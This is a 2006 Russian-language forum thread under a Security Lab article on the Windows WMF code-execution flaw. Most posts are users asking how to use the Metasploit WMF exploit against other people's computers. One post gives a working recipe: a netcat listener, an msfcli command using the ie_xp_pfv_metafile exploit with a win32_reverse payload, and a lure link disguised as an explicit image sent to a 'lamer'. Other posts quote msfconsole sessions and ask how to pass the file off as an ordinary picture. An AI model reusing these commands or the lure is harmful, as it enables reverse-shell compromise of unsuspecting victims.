Security Lab



Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти  
Форум » Обсуждение статей (закрыто) » Обсуждение публикаций
Страницы: Пред. 1 2 3 4 5
RSS
Выполнение произвольного кода в Microsoft Windows при обработке WMF фа
 
#81
Это нравится:0Да/0Нет
11.01.2006 00:03:49
Цитата
Гость пишет:
тогда как свой экзе запустить асинхронно с этим?

или такой тогда толк?

мож я что то
непонимаю ??

смылс exe если у тебя появляется возможность получить cmd?
 
 
 
#82
Это нравится:0Да/0Нет
11.01.2006 00:30:08
m2infect, а через cmd качать файл из сети через ftp лучше? я вот только так придумал... может ты чего нить другое подскажешь?
 
 
 
#83
Это нравится:0Да/0Нет
11.01.2006 18:28:50
ну и как этим КМД воспользоваться,
чтоб запустить свой ЭКЗЕ на удаленной машине?
 
 
 
#84
Это нравится:0Да/0Нет
13.01.2006 19:18:29
Смору и идивляюсь тем кто пишет эти замечания что если не IE все пучком да если расширение JPG -PNG то пучком а если WMF то эти другие Браузеры пердлагают или скачать или запустить проводником а если запустишь заразится ---- acdsee не поможет так как если еспользуестя модифицированый(слияние этой уязвимости с уязвимостью jpeg + -lib) вариант --- не давние изобретение то видно и картинку и код сплоита отправляется в обработку
 
 
 
#85
Это нравится:0Да/0Нет
14.01.2006 12:32:32
Хелп
Unsupported http client connected from 192.168.0.100:1499 using
И так много раз, только меняет порты
что то сделть надО?!

как мне дургого человека повесить на сплойт
мои догадки : set HTTPHOST свой ай пи, куда он будет заходить
set LHOST - его ай пи, точнее жертвы, получается так?!
 
 
 
#86
Это нравится:0Да/0Нет
16.01.2006 09:14:59
Для тех кто в танке:

nc -l -p 31337
msfcli.exe ie_xp_pfv_metafile PAYLOAD=win32_reverse LHOST=192.168.1.20 LPORT=31337 E

192.168.1.20 - к примеру адрес нашей машины
пихаем ламу ссылку http://192.168.1.20:8080/porno/photos/pelotka.wmf
 
 
 
#87
Это нравится:0Да/0Нет
31.01.2006 15:27:01
2 noby2010, чет сразу трмознул, прикольно получается :)))
 
 
 
#88
Это нравится:0Да/0Нет
06.02.2006 00:23:06
так никто и не пробывал win32_exec ? если писать команды типа Dir, echo ... то при запуске вылетает ошибка и эксплорер закрывается...
 
 
 
#89
Это нравится:0Да/0Нет
14.02.2006 10:34:31
как сделать так, чтобы получить wmf-файл и подсунуть ему не ссылкой, а типа это рисунок, чтобы он его скачал и посмотрел?
 
 
 
#90
Это нравится:0Да/0Нет
22.02.2006 18:44:36
Блин, не хочет скот работать !
Пишет -  Waiting for connections to http://127,0,0,1:8080 и все !!!
А почему не 0,0,0,0:8080 ???
Help me !
 
 
 
#91
Это нравится:0Да/0Нет
19.03.2006 13:08:27
так как запустить msfconsole ?
 
 
 
#92
Это нравится:0Да/0Нет
02.04.2006 15:19:54
[*]Starting Reverse Handler.
[*]Waiting for connections to http://217.21.34.200:8080/ - никакого *.wmf'а  !!???
случай в локалке, как вообще его (*.wmf) сделать? и где лучше кинуть?
спс
 
 
 
#93
Это нравится:0Да/0Нет
16.04.2006 00:15:26
Зачем слили в паблик сплоит. ;( Пускай ламаки сами учаца! Хватит им шары
 
 
 
#94
Это нравится:0Да/0Нет
25.04.2006 14:55:21
я через kaht2 парился, неоднеого бажного компа! это может от провайдера зависить??
 
 
 
#95
Это нравится:0Да/0Нет
30.04.2006 20:09:45
У меня таже фигня :

msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf ie_xp_pfv_metafile(win32_reverse) > exploit
Waiting for connections to http://127,0,0,1:8080

wmf не генерирует
кто знает в чем дело!? help
 
 
 
#96
Это нравится:0Да/0Нет
04.05.2006 18:28:27
а через что залазить на комп дертвы?
 
 
 
#97
Это нравится:0Да/0Нет
12.05.2006 11:38:41
Кстати на http://www.xakep.ru/magazine/xa/086/066/1.asp  есть статейка "WMF : баг года" преинтерестная
 
 
 
#98
Это нравится:0Да/0Нет
30.10.2006 06:52:51
и у меня такая же фигня =]
 
 
 
#99
Это нравится:0Да/0Нет
30.11.2006 13:14:49
блин народ помогите скажите что я делаю не так

msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf ie_xp_pfv_metafile(win32_reverse) > set LHOST 192.168.0.149
LHOST -> 192.168.0.149
msf ie_xp_pfv_metafile(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Waiting for connections to http://192.168.0.149:8080/
[*] HTTP Client connected from 192.168.0.222:1352, sending 1140 bytes of payload...


и на это ничего не происходит проверино на 98 2000 хр   и все одно и тоже
 
 
 
Страницы: Пред. 1 2 3 4 5
Читают тему